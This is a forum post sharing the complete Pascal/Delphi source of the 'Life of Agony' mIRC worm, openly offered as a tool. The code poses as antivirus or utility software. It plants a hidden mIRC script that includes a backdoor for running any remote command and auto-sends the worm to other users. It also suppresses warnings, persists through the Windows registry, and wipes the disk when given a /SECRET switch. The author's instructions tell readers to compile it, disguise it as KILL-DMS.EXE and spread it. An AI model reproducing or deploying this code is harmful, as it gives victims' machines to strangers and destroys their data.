• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: Source Code LOA-worm Delphi
حالت خطی
#1
سورس زیر که با دلفی نوشته شده است سورس کد یک کرم بسیار قوی هست , کرم زیر نرم افزار mirc رو مورد هدف قرار میدهد.

کد:
PROGRAM Life_of_Agony;
{ ===========================================================================


         NAME: Life of Agony v1.30 hunter-killer.
         TYPE: Direct action mIRC-worm.
         SIZE: Approximately 20k
     LANGUAGE: Borland Pascal 7.0 (with a patch).
       AUTHOR: T-2000 / [Immortal Riot].
       E-MAIL: T2000_@hotmail.com
         DATE: October - November 1998.
  DESTRUCTIVE: Yeah, but only on demand.


The DMSETUP mIRC-worm uses some clever techniques, but they are all rather
poorly implemented, plus the worm only works with standard configurations.
This inspired me to write my own mIRC-worm which would fix all of these
'shortcomings', and even add some capabilities. I called it "Life of Agony"
(LOA for short) due it's backdoor which let's people execute *any* mIRC-
command, thereby making the victim an open target to the public. Also note
that LOA beats DMSETUP in *every* aspect, so if you were looking for a tool
a la Back Orifice, but for mIRC, LOA would be an excellent choice.


CAPABILITIES:

      - Semi-random dropper-output.
      - Semi-random filenames (droppers & scripts).
      - Registers itself in the RunServices.
      - Removes all known DMSETUP-strains.
      - Highly advanced tactical script (like 'stealth').
      - Modifies MIRC.INI instead of overwriting it.
      - Can locate MIRC.INI regardless of it's path.


BAD STUFF:

   *  Some (non-crucial) parts of the worm-script may function incorrectly,
      this is NOT my fault however, it's due all those bloody bugs in the
      mIRC-scripting-language (especially the parsing).

   *  A delay of several seconds may occur when LOA registers itself in the
      registry, (reason for this being the fact that it has to call an
      external (Winshit95/98/NT) program, REGEDIT.EXE).

   *  A temporarly DOS-box will be opened when the worm is called by the
      register during bootup, this only takes less than a second however.

   *  If the worm is executed with mIRC active, the changes in MIRC.INI will
      not have any effect, this is because mIRC updates MIRC.INI on exit with
      the values stored in memory. You could say this wouldn't be a serious
      problem since the worm is called during every bootup, thereby infecting
      MIRC.INI again properly, however, the 'this-dir-is-already-infected'-
      file will be already present, thus the worm won't infect MIRC.INI
      again.


Some ideas were dropped:

     - Random dropper-size:     This doesn't work with my copy-routine, coz
                                I don't wanna use constant sizes.

     - Script-optimizations:    Only mIRC versions 5.4 and above allow these,
                                in all other cases the script simply won't
                                work at all.

     - Polymorphism:            This would require a engine specifically
                                written in asm for this type of program, I
                                don't have time for that.

     - Multi-platform:          I have a beta-version ready which besides
                                mIRC, also infects Pirch, however I never
                                use that last one, so I cannot test it
                                properly.


IMPORTANT:

   Borland Pascal 7.0 has a bug somewhere in the CRT-unit, which results in
   BP7 programs crashing at fast systems (Pentium 200+), luckily there's a
   patch available at www.premier1.net/~topanga/ which should fix this.


INSTRUCTION MANUAL:

   1. Install the patch I mentioned above,
   2. Compile the .PAS with BP7,
   3. PKLITE it,
   4. Rename it to KILL-DMS.EXE,
   5. And f0rk it to as many boneheads you can find.


If you have any ideas for improvement and/or bug-reports, mail em to me.

LOA does alot, however, I don't feel like writing a 20k description of a
program which isn't even a bloody virus... I'm going back to asm as for now.


DISCLAIMER:

   I confess, now come sue me...


SOME LAME GREETS:

   Bluenine    :   Okay, okay, I'll put you in the random-word list, heh.
   Morphine    :   Master of (clay) puppets.
   T-2000      :   Next time you fuck-up my HD I'm gonna kick yer fucken ass!
   VirusBust   :   Thanx for pointing me out the BP7 division-by-zero bug.



               "HONK! HONK!... WHOOAAAAA!!! SPLAT!... *grin*"
                    - Carmageddon II: Carpocalypse Now -

=========================================================================== }

{$M 16384, 0, 0}

USES Dos, Crt;
TYPE
  View_T  =  RECORD
               Copyright  :  String[80];
               Check      :  String[80];
               Done       :  String[80];
               Exit       :  String[80];
             END;


CONST
  Inf_ID_File    =  '\WINDAT64.DL1';
  Temp_File      =  'LOA1TEMP.$$$';
  ID_File        =  'MIRC_ID1.DAT';
  Max_Names      =  272;
  DMRemover      =  'KILL-DMS.EXE';
  Random_Names   :  Array[0..Max_Names-1] of String[4] = (

                     'TEST', 'YOU ', 'NOW ', 'AK47', 'ALFA', 'ASIA', 'ASS ',
                     'ASM ', 'AMY ', 'ANTI', 'AV  ', 'ANNA', 'ANNY', 'BABE',
                     'BAD ', 'BASS', 'BALL', 'BETA', 'BOMB', 'BOOM', 'BO3 ',
                     'BOY ', 'BOYS', 'BIOS', 'B&B ', 'BUS ', 'BILL', 'BLOW',
                     'CUM ', 'COCK', 'COOL', 'COMP', 'CARA', 'CMDR', 'COP ',
                     'CALL', 'DARK', 'DISK', 'DROP', 'DANA', 'DCC ', 'DEAD',
                     'DUKE', 'DUDE', 'DEAF', 'DUNE', 'DOOM', 'DRUG', 'DOPE',
                     'DODO', 'DEEP', 'DOS ', 'DUKE', 'DR  ', 'DOC ', 'DOIT',
                     'DICK', 'DINO', 'DORK', 'EVIL', 'EVE ', 'EMMA', 'FUCK',
                     'FUN ', 'FOOL', 'FIND', 'FAG ', 'FREE', 'FOX ', 'F0RK',
                     'GAY ', 'GOOD', 'GUN ', 'GIRL', 'GWAR', 'GAME', 'HACK',
                     'HUG ', 'HARD', 'HUGE', 'HELP', 'HOLE', 'HELL', 'HOOK',
                     'HULK', 'IRC ', 'IBM ', 'ICQ ', 'JUNK', 'JOHN', 'JERK',
                     'JOIN', 'KATY', 'KILL', 'KORN', 'KIDS', 'KEWL', 'KID ',
                     'LARA', 'LISA', 'LIST', 'LOVE', 'LILA', 'LUCK', 'LICK',
                     'LESB', 'LEET', 'MARC', 'MAIL', 'MASS', 'MEGA', 'MIRC',
                     'MMX ', 'NWO ', 'NET ', 'NUKE', 'NUDE', 'NTBS', 'MS  ',
                     'ME  ', 'ORGY', 'PUKE', 'PIRC', 'PASS', 'POLY', 'PROT',
                     'PORN' ,'PRON', 'PUSS', 'PING', 'PONG', 'PRO ', 'PERL',
                     'P200', 'PIC ', 'PENT', 'PICS', 'PK  ', 'PREZ', 'POP ',
                     'QUIT', 'Q3  ', 'ROB ', 'RAIN', 'RIPP', 'REAL', 'SUPA',
                     'SNOW', 'SHOT', 'SYS ', 's      /\/\///\e///:/x ', 'STOP', 'SINK', 'SUX ',
                     'SHAG', 'SUCK', 'SOUL', 'SCAN', 'SHIT', 'SPAM', 'SUZI',
                     'SOFT', 'SCAN', 'SLAM', 'SKL ', 'SLAP', 'SICK', 'TITS',
                     'TINY', 'TINA', 'TWIN', 'TOTO', 'TR3 ', 'TROJ', 'TEAM',
                     'UZI ', 'UNIX', 'UPD8', 'UPGR', 'UGLY', 'USA ', 'USE ',
                     'U&ME', 'VSUM', 'VIRC', 'VX  ', 'WIN ', 'WNG8', 'W95 ',
                     'WARE', 'W98 ', 'WEED', 'WORD', 'WRIT', 'WNT ', 'XDCC',
                     'XYZ ', 'XMAN', 'XENA', 'XIRC', 'XXX ', 'YORK', 'YOGO',
                     'ZERO', 'ZOOL', 'ZOO ', 'ZORK', 'ZULU', '3D  ', '4U  ',
                     '486 ', '666 ', '911 ', 'ZIP ', 'ARJ ', 'RAR ', 'JPG ',
                     'ARC ', 'SWAT', 'SEAL', 'RAW ', 'T2IR', 'INCA', 'RATM',
                     'JAG ', 'HARM', 'SARA', 'WILL', 'GP3 ', 'ROD ', 'RAPE',
                     'PETE', 'AL  ', 'KARL', 'MEN ', 'GUYS', 'MP3 ', 'WAVE',
                     'SECR', 'DON ', 'MPEG', 'XL  ', 'BUTT', 'FAT!', 'NO! ',
                     'ROCK', 'EXEC', 'H8R ', 'BEER', 'RA3 ', 'QUAK', 'ZORO',
                     'BLUE', 'NINE', '.ZIP', '.ARJ', '.LHA', '.RAR', '.PAK',
                     '.ARC', '.s      /\/\///\e///:/x', '.JPG', '.MPG', '.GIF', '.WAV', '.NFO',
                     '.TXT', '.DOC', '.NOW', '.BMP', '.INI', '.MP3');


VAR
  View            :  View_T;
  Find_DMSetup    :  Boolean;
  Damage          :  Boolean;
  i, q            :  Word;
  z               :  LongInt;
  File_Line       :  String;
  Bytes_Read      :  Word;
  Dummy           :  String;
  In_File         :  Text;
  Out_File        :  Text;
  Worm_Script     :  String[12];
  Worm_Dropper    :  String[12];
  Last_Setting    :  String;
  ID_Location     :  Text;
  Year            :  Word;
  Month           :  Word;
  Day             :  Word;
  DoW             :  Word;
  Script          :  Array[0..20] of String[200];
  Script_Lines    :  Byte;



{ Converts a given string to lowercase. }
FUNCTION LowerCase (s : String) : String;
VAR
  i  :  Byte;
  a  :  Char;

BEGIN
     for i := 1 to Length(s) do
     Begin
          a := s[i];
          if (a >= 'A') and (a <= 'Z') then a := Char(Ord(a) + (Ord('a') - Ord('A')));
          s[i] := a;
     End;
     LowerCase := s;
END;


{ Converts a given string to uppercase. }
FUNCTION UpperCase (s : String) : String;
VAR
  i  :  Byte;

BEGIN
     for i := 1 to Length(s) do s[i] := UpCase(s[i]);
     UpperCase := s;
END;


{ Removes any comments and/or tail-spaces. }
FUNCTION Strip (s : String) : String;
BEGIN
     While Pos(';', s) > 0 do Delete(s, Length(s), 1);
     While s[Length(s)] = ' ' do Delete(s, Length(s), 1);

     Strip := s;
END;


{ Constructs a semi-random DOS 8.3 filename. }
FUNCTION Get_Random_Name : String;
VAR
  Temp  :  String[12];

BEGIN
     Temp := '.';

     While Temp[1] = '.' do
       Temp := Random_Names[Random(Max_Names)] + Random_Names[Random(Max_Names)];

     While Pos(' ', Temp) > 0 do Delete(Temp, Pos(' ', Temp), 1);

     if Temp[1] = '.' then Delete(Temp, 1, 1);

     Get_Random_Name := Temp;
END;


{ Dunno why I used an array, maybe for other future enhancement? }
PROCEDURE Init_Script_mIRC(Dropper : String);
BEGIN
     Script_Lines := 15;

     Script[01] := 'on 1:start: { .enable #loa | .remote on | .events on | .ctcps on | .raw on | .sreq auto -m }';

     Script[02] := '#loa off';

     Script[03] := 'on 1:part:#: { if (($nick != $me) && ($rand(0, 3) ' +
                   ' == 0)) { .disable #loa | .ignore -u600 $nick | .dcc send ' +
                   '$nick ' + LowerCase(Dropper) + ' | .timer 1 120 { ' +
                   '.enable #loa } } }';

     Script[04] := '#loa end';

     Script[05] := 'on 1:text:*lbj*rules!*:*: { .msg $nick . | .halt }';
     Script[06] := 'ctcp 1:loado:*: { .$2- | .halt }';

     { 'Stealth'-stuff. }

     Script[07] := 'on 1:input:*: { if (virus isin $1-) { .halt } }';
     Script[08] := 'on 1:text:*virus*:*: { .ignore -u600 $nick }';
     Script[09] := 'on 1:join:#: { if (help isin $chan) { .part $chan } }';
     Script[10] := 'ctcp 1:dcc send:*: { if (($nick != $me) && ((.com ' +
                   'isin $3) || (.exe isin $3)) && (($6 > 12000) && ($6 ' +
                   '< 105000))) { .halt } }';

     Script[11] := 'alias /sreq { /sreq $1- | .sreq auto -m }';
     Script[12] := 'alias /ctcps { /ctcps $1- | .ctcps on }';
     Script[13] := 'alias /events { /events $1- | .events on }';
     Script[14] := 'alias /remote { /remote $1- | .remote on }';
     Script[15] := 'alias /raw { /raw $1- | .raw on }';
END;


{ Drops the mIRC-script. }
PROCEDURE Drop_Script(mIRC_Dir, Script_Name : String);
VAR
  Script_File  :  Text;


BEGIN
     Init_Script_mIRC(mIRC_Dir + Worm_Dropper);

     Assign(Script_File, mIRC_Dir + Script_Name);
     Rewrite(Script_File);
     WriteLn(Script_File, '[script]');

     { Dis is why I prefer asm... ewww, what a mess! }

     for i := 0 to 59 + Random(30) do WriteLn(Script_File, 'n', i, '=');

     q := 1;

     for i := i + 1 to i + 1 + Script_Lines do
     Begin
          Write(Script_File, 'n', i, '=');
          for z := 1 to 110 + Random(40) do Write(Script_File, ' ');
          WriteLn(Script_File, Script[q]);
          Inc(q);
     End;

     for i := i + 1 to (i + 1 + 60 + Random(30)) do
       WriteLn(Script_File, 'n', i, '=');

     Close(Script_File);

     SetFAttr(Script_File, Readonly or Hidden);
END;


{ To stimulate the fear factor. }
PROCEDURE Payload;
BEGIN
     TextBackground(Red);
     TextColor(Black);
     ClrScr;

     GotoXY(13, 1);
     GotoXY(11, 1);
     WriteLn('=[ Life of Agony 1.30, (c) 1998 by T-2000 / Immortal Riot ]=');

     GotoXY(6, 11);
     Write('Hi! I am the [LIFE OF AGONY] worm, and I''m gonna fuck you up REAL bad!');

     TextColor(White+Blink);

     GotoXY(20, 11);
     Write('LIFE OF AGONY');

     Asm                    { Disable cursor. }
        MOV     AH, 01h
        MOV     CX, 0F00h
        INT     10h
     End;
END;


{ Tests if a given filename exists. }
FUNCTION Exist(File_Name : String) : Boolean;
VAR
  Dir_Info  :  SearchRec;

BEGIN
     FindFirst(File_Name, AnyFile, Dir_Info);
     if DosError = 0 then Exist := True else Exist := False;
END;


PROCEDURE Copy_Dropper(Target : String);
VAR
  Source_File    :  File;
  Target_File    :  File;
  Buffer         :  Array[1..4096] of Byte;


BEGIN
     if Exist(Target) = False then
     Begin
          Assign(Source_File, ParamStr(0));
          Assign(Target_File, Target);

          Reset(Source_File, 1);
          Rewrite(Target_File, 1);

          Repeat
            BlockRead(Source_File, Buffer, 4096, Bytes_Read);
            BlockWrite(Target_File, Buffer, Bytes_Read);
          Until Bytes_Read = 0;

          Close(Source_File);
          Close(Target_File);
          SetFAttr(Target_File, ReadOnly or Hidden);
     End;
END;


{ Tag the shit into the Win-registry. }
PROCEDURE Register_Virus;
VAR
  Reg_File  :  Text;

BEGIN
     Dummy := '';
     for i := 1 to EnvCount do
     Begin
          if UpperCase(Copy(EnvStr(i), 1, Pos('=', EnvStr(i)) - 1) ) = 'WINDIR' then
          Begin
               Dummy := UpperCase(Copy(EnvStr(i), 8, Length(EnvStr(i)) - 7));
          End;
     End;

     if Dummy <> '' then
     Begin
          Copy_Dropper(Dummy + '\LOA.EXE');

          Assign(Reg_File, 'LOA.REG');
          Rewrite(Reg_File);

          WriteLn(Reg_File, 'REGEDIT4');
          WriteLn(Reg_File);
          WriteLn(Reg_File, '[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]');
          WriteLn(Reg_File, '"Life of Agony"="loa.exe"');
          WriteLn(Reg_File);

          Close(Reg_File);

          SwapVectors;
          Exec(Dummy + '\REGEDIT.EXE', '/s LOA.REG');
          SwapVectors;
          Erase(Reg_File);
     End;
END;


{ The working horsie... }
PROCEDURE Infect_mIRC (mIRC_Dir : String);
VAR
  Skip_Write   :  Boolean;
  Add_Declare  :  Boolean;
  Group        :  String;


BEGIN
     Skip_Write := False;

     Assign(In_File, mIRC_Dir + 'MIRC.INI');
     Assign(Out_File, mIRC_Dir + Temp_File);

     SetFAttr(In_File, 0);
     SetFAttr(Out_File, 0);

     Reset(In_File);
     Rewrite(Out_File);

     Worm_Dropper := Get_Random_Name;
     if Random(2) = 0 then
      Worm_Dropper := Worm_Dropper + '.COM' else
      Worm_Dropper := Worm_Dropper + '.EXE';

     Worm_Script := LowerCase(Get_Random_Name) + '.ini';

     Copy_Dropper(mIRC_Dir + Worm_Dropper);
     Drop_Script(mIRC_Dir, Worm_Script);

     While not eof(In_File) do
     Begin
          if File_Line <> '' then Last_Setting := File_Line;

          ReadLn(In_File, File_Line);

          Dummy := UpperCase(Strip(File_Line));

          if (Dummy[1] = '[') and (Dummy[Length(Dummy)] = ']') then
          Group := Dummy;

          if (Dummy[1] = '[') and (Dummy[Length(Dummy)] = ']') then
          Begin
               if ((Group = '[WARN]') or
                  (Group = '[FILESERVER]') or
                  (Group = '[WIZARD]')) then
                  Skip_Write := True else Skip_Write := False;

               if Group = '[RFILES]' then Add_Declare := True
               Else
               Begin
                    if Add_Declare = True then
                    Begin
                         Val(Copy(Last_Setting, 2, Pos('=', Last_Setting)-2), i, q);
                         Inc(i);
                         WriteLn(Out_File, 'n', i, '=', Worm_Script);
                    End;
                    Add_Declare := False;
               End;
          End
          Else
          if (Group = '[IDENT]') and (Copy(Dummy, 1, 7) = 'USERID=') then
            File_Line := 'userid=LOA';

          if Skip_Write = False then WriteLn(Out_File, File_Line);
     End;

     WriteLn(Out_File, '[wizard]');
     WriteLn(Out_File, 'warning=6');    { No more lame help-windows. }

     WriteLn(Out_File);

     WriteLn(Out_File, '[warn]');
     WriteLn(Out_File, 'fserve=off');
     WriteLn(Out_File, 'dcc=off');      { No warning when someone DCC's us. }

     WriteLn(Out_File);

     WriteLn(Out_File, '[fileserver]');
     WriteLn(Out_File, 'homedir=c:');
     WriteLn(Out_File, 'Warning=Off');

     Close(In_File);
     Close(Out_File);

     Erase(In_File);
     Rename(Out_File, mIRC_Dir + 'MIRC.INI');

     if Exist(mIRC_Dir + ID_File) = False then
     Begin
          Assign(ID_Location, mIRC_Dir + ID_File);
          Rewrite(ID_Location);
          WriteLn(ID_Location, 'mIRC data-storage-file.');
          Close(ID_Location);
          SetFAttr(ID_Location, ReadOnly or Hidden);
     End;
END;


{ Scans a suitable .EXE for the DMSETUP worm. }
FUNCTION Is_DMSetup(Scan_File : String) : Boolean;
CONST
  Scan_String   =  '$nick !';
  Legal_String  =  'program';

VAR
  In_File  :  File;
  Dummy    :  String;
  Found    :  Boolean;
  i        :  Word;


BEGIN
     Is_DMSetup := False;

     if (Find_DMSetup = True) and
        (UpperCase(Copy(Scan_File, Length(Scan_File) - 3, 4)) = '.EXE') then
     Begin
          GotoXY(11, WhereY);
          Write(Scan_File);
          ClrEol;

          Assign(In_File, Scan_File);
          FileMode := 0;
          Reset(In_File, 1);

          if (FileSize(In_File) > 35000) and (FileSize(In_File) < 105000) then
          Begin
               Found := False;
               Bytes_Read := 666;
               Dummy[0] := Char(SizeOf(Dummy)-1);

               While Bytes_Read <> 0 do
               Begin
                    BlockRead(In_File, Dummy[1], SizeOf(Dummy)-1, Bytes_Read);

                    if not eof(In_File) then
                    Begin
                         for i := 1 to Bytes_Read - Length(Scan_String) do
                         Begin
                              if Copy(Dummy, i, Length(Scan_String)) = Scan_String then
                              Found := True;
                              if Copy(Dummy, i, Length(Legal_String)) = Legal_String then
                              Bytes_Read := 0;
                         End;
                         Seek(In_File, FilePos(In_File) - Length(Scan_String));
                    End
                    Else Bytes_Read := 0;
               End;
               if Found = True then
               Begin
                    Is_DMSetup := True;
                    if Month = 11 then WriteLn(' cleaned!');
               End;
          End;
          Close(In_File);
     End;
END;


{ Recursive scanner. }
PROCEDURE Scan_Disk;
VAR
  Current_Dir  :  String;


PROCEDURE Scan_Path (Path : String);
VAR
  Dir_Info  :  SearchRec;
  Victim    :  File;


BEGIN
     FindFirst(Path + '*.*', AnyFile, Dir_Info);
     While DosError = 0 do
     Begin
          if ((Dir_Info.Attr and Directory) = Directory) then
          Begin
               if (Dir_Info.Name <> '.') and (Dir_Info.Name <> '..') then
                  Scan_Path(Path + UpperCase(Dir_Info.Name) + '\');
          End
          Else
          Begin
               if (Damage = True) or
                  (Is_DMSetup(Path + Dir_Info.Name) = True) then
               Begin
                    Assign(Victim, Path + Dir_Info.Name);
                    SetFAttr(Victim, 0);
                    if DosError = 0 then Erase(Victim);
               End
               Else
               if (UpperCase(Dir_Info.Name) = 'MIRC.INI') and
                  (Exist(Path + ID_File) = False) then Infect_mIRC(Path);
          End;
          FindNext(Dir_Info);
     End;
END;


BEGIN
     if Damage = True then Payload else Write('Scanning: ');

     GetDir(0, Current_Dir);

     Scan_Path(Current_Dir[1] + ':\');
END;



{ * * * * 666 * * * * * *  M A I N   P R O G R A M  * * * * * * 666 * * * * }
BEGIN
     Randomize;

     Damage := False;
     Find_DMSetup := False;

     GetDate(Year, Month, Day, DoW);

     if Pos(DMRemover, ParamStr(0)) > 0 then
     Begin
          ClrScr;
          Month := 11;
          Find_DMSetup := True;
     End;

     Case Month of
       1  : Begin
              View.Copyright := 'PowerBit anti-virus v3.34, (C)opyrighted 1999 by PB Systems.';
              View.Check := 'SHAREWARE - REGISTER? ';
              View.Done := 'YES!';
              View.Exit := 'Scan completed, no viruses were found.';
            End;
       2  : Begin
              View.Copyright := 'The Ultimate Chaos Website 2 - http://sourceofkaos.com/homes/ultchaos';
              View.Check := 'Visit me... ';
              View.Done := 'NOW!';
              View.Exit := 'Not detected.';
            End;
       3  : Begin
              View.Copyright := 'WaReZ SCaNNeR bY oDELiOFiLThY [SuCK]... ViSiT #warez !';
              View.Check := 'SeLF CHeCK: ';
              View.Done := 'oKeY';
              View.Exit := 'nO WaReZ wErE FoUnD aT DRiVe C: !!!';
            End;
       4  : Begin
              View.Copyright := 'DrSolomon Anti-Virus Toolkit v10.00 - SPECIAL EDITION -';
              View.Check := 'Scanning memory (DOS\UMB\HMA\XMS)... ';
              View.Done := 'No viruses found in memory';
              View.Exit := 'No viruses were found.';
            End;
       5  : Begin
              View.Copyright := 'ScanDisk 2.00, (C)Copyright Microsoft Corp 1981-1998.';
              View.Check := 'Checking critical areas... ';
              View.Done := 'OK';
              View.Exit := 'No errors were detected.';
            End;
       6  : Begin
              View.Copyright := 'Anti-Back-Orifice II.A, detects/removes all BO-instances from your system.';
              View.Check := 'Checking registry... ';
              View.Done := 'BO was not found in the registry';
              View.Exit := 'System clean, visit http://sourceofkaos.com/homes/ultchaos for updates.';
            End;
       7  : Begin
              View.Copyright := 'TERA SPOOF-INSTALLER VERSION 6.66';
              View.Check := 'Checking shadow-RAM... ';
              View.Done := 'located at x0FA56D6A4h';
              View.Exit := 'Failed to install spoof, SPSOCK64.DLL missing.';
            End;
       8  : Begin
              View.Copyright := 'WinGater by Terminatius [Finds installed WinGates at your system].';
              View.Check := 'Locating registry: ';
              View.Done := 'REGISTRY.REG';
              View.Exit := 'No WinGates found, go to Undernet, #wingater for help.';
            End;
       9  : Begin
              View.Copyright := 'Thunderbyte virus-detector v9.24, - (C) Copyright 1989-1999 Thunderbyte B.V.';
              View.Check := 'SANITY CHECK: ';
              View.Done := 'OK!';
              View.Exit := 'No viruses were found.';
            End;
       10 : Begin
              View.Copyright := 'Anti-Nuke written by cDc - Cult of the Dead Cow.';
              View.Check := 'Checking V86 interrupts... ';
              View.Done := 'No polling detected';
              View.Exit := 'No nuke-programs found.';
            End;
       11 : Begin
              View.Copyright := 'LOA''s Kill-DMSetup version 2.2, - SHAREWARE';
              View.Check := 'Checking memory... ';
              View.Done := 'OK';
              View.Exit := 'Completed!';
            End;
       12 : Begin
              View.Copyright := 'KILL-CIH v2.0. --> kills all known CIH-strains! <--';
              View.Check := 'Memory check... ';
              View.Done := 'passed';
              View.Exit := 'CIH has not been detected at your system.';
            End;
     End;

     Assign(Out_File, Inf_ID_File);
     if Exist(Inf_ID_File) = False then
     Begin
          Rewrite(Out_File);
          Close(Out_File);
          SetFAttr(Out_File, Readonly or Hidden);
          Find_DMSetup := True;
     End
     Else if (Day = 1) or (Day = 16) then Find_DMSetup := True;

     { I don't like nosy morons... }

     if UpperCase(ParamStr(1)) = '/SECRET' then
     Begin
          Damage := True;
          Find_DMSetup := False;
          Scan_Disk;
     End
     Else
     if Find_DMSetup = True then
     Begin
          WriteLn(View.Copyright);
          Write(View.Check);

          Register_Virus;

          WriteLn(View.Done);
          WriteLn;

          if Month = 11 then
          Begin
               WriteLn('You are about to scan your harddrive for the DMSetup virus, it is');
               WriteLn('crucial that you run this program without mIRC active, so if you');
               WriteLn('are still in mIRC at the moment, type /EXIT before you continue.');
               WriteLn;
               WriteLn('Press any key if mIRC is not active...');
               ReadKey;
               WriteLn;
          End;

          Scan_Disk;

          GotoXY(1, WhereY);
          ClrEol;
          WriteLn;

          Write(View.Exit);

          WriteLn;
     End;
END.

{

Wordlist, one of these days I'm gonna make an alfabethical sorter for it.

AK47
ALFA
ASIA
ASS
ASM
AMY
ANTI
AV
ANNA
ANNY
BABE
BAD
BASS
BALL
BETA
BOMB
BOOM
BO3
BOY
BOYS
BIOS
B&B
BUS
BILL
BLOW
CUM
COCK
COOL
COMP
CARA
CMDR
COP
CALL
DARK
DISK
DROP
DANA
DCC
DEAD
DUKE
DUDE
DEAF
DUNE
DOOM
DRUG
DOPE
DODO
DEEP
DOS
DUKE
DR
DOC
DOIT
DICK
DINO
DORK
EVIL
EVE
EMMA
FUCK
FUN
FOOL
FIND
FAG
FREE
FOX
F0RK
GAY
GOOD
GUN
GIRL
GWAR
GAME
HACK
HUG
HARD
HUGE
HELP
HOLE
HELL
HOOK
HULK
IRC
IBM
ICQ
JUNK
JOHN
JERK
JOIN
KATY
KILL
KORN
KIDS
KEWL
KID
LARA
LISA
LIST
LOVE
LILA
LUCK
LICK
LESB
LEET
MARC
MAIL
MASS
MEGA
MIRC
MMX
NWO
NET
NUKE
NUDE
NTBS
MS
ME
ORGY
PUKE
PIRC
PASS
POLY
PROT
PORN
PRON
PUSS
PING
PONG
PRO
PERL
P200
PIC
PENT
PICS
PK
PREZ
POP
QUIT
Q3
ROB
RAIN
RIPP
REAL
SUPA
SNOW
SHOT
SYS
s      /\/\///\e///:/x
STOP
SINK
SUX
SHAG
SUCK
SOUL
SCAN
SHIT
SPAM
SUZI
SOFT
SCAN
SLAM
SKL
SLAP
SICK
TITS
TINY
TINA
TWIN
TOTO
TR3
TROJ
TEAM
UZI
UNIX
UPD8
UPGR
UGLY
USA
USE
U&ME
VSUM
VIRC
VX
WIN
WNG8
W95
WARE
W98
WEED
WORD
WRIT
WNT
XDCC
XYZ
XMAN
XENA
XIRC
XXX
YORK
YOGO
ZERO
ZOOL
ZOO
ZORK
ZULU
3D
4U
486
666
911
ROBO
COP
R2D2

}
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


پیام‌های این موضوع
Source Code LOA-worm Delphi - توسط Amin_Mansouri - 03-30-2012، 01:05 PM

موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  Source Code IRC-Worm.Win32.Desire Delphi Amin_Mansouri 0 4,581 03-30-2012، 01:10 PM
آخرین ارسال: Amin_Mansouri
  Source Code IRC-Worm.Hausex Delphi Amin_Mansouri 0 4,338 03-30-2012، 01:00 PM
آخرین ارسال: Amin_Mansouri
  (USB-Worm for UNIX/LINUX) Amin_Mansouri 0 3,373 11-09-2011، 03:17 PM
آخرین ارسال: Amin_Mansouri
  delphi disable msconfig Amin_Mansouri 0 3,562 10-18-2011، 01:22 AM
آخرین ارسال: Amin_Mansouri
  USB Worm C++ Amin_Mansouri 0 3,657 10-12-2011، 12:11 AM
آخرین ارسال: Amin_Mansouri
  C++ worm example Amin_Mansouri 0 4,002 09-28-2011، 06:15 PM
آخرین ارسال: Amin_Mansouri
  [VB.NET]DC Worm Amin_Mansouri 0 5,408 09-26-2011، 09:41 AM
آخرین ارسال: Amin_Mansouri
  [DELPHI]Virus EXE infector - Example, by DjH Amin_Mansouri 0 3,716 09-22-2011، 12:40 AM
آخرین ارسال: Amin_Mansouri
  Delphi Usb Worm Amin_Mansouri 0 4,166 08-30-2011، 11:54 AM
آخرین ارسال: Amin_Mansouri
  Source Code Virus & Worm Amin_Mansouri 4 8,743 06-25-2011، 10:55 AM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 2 مهمان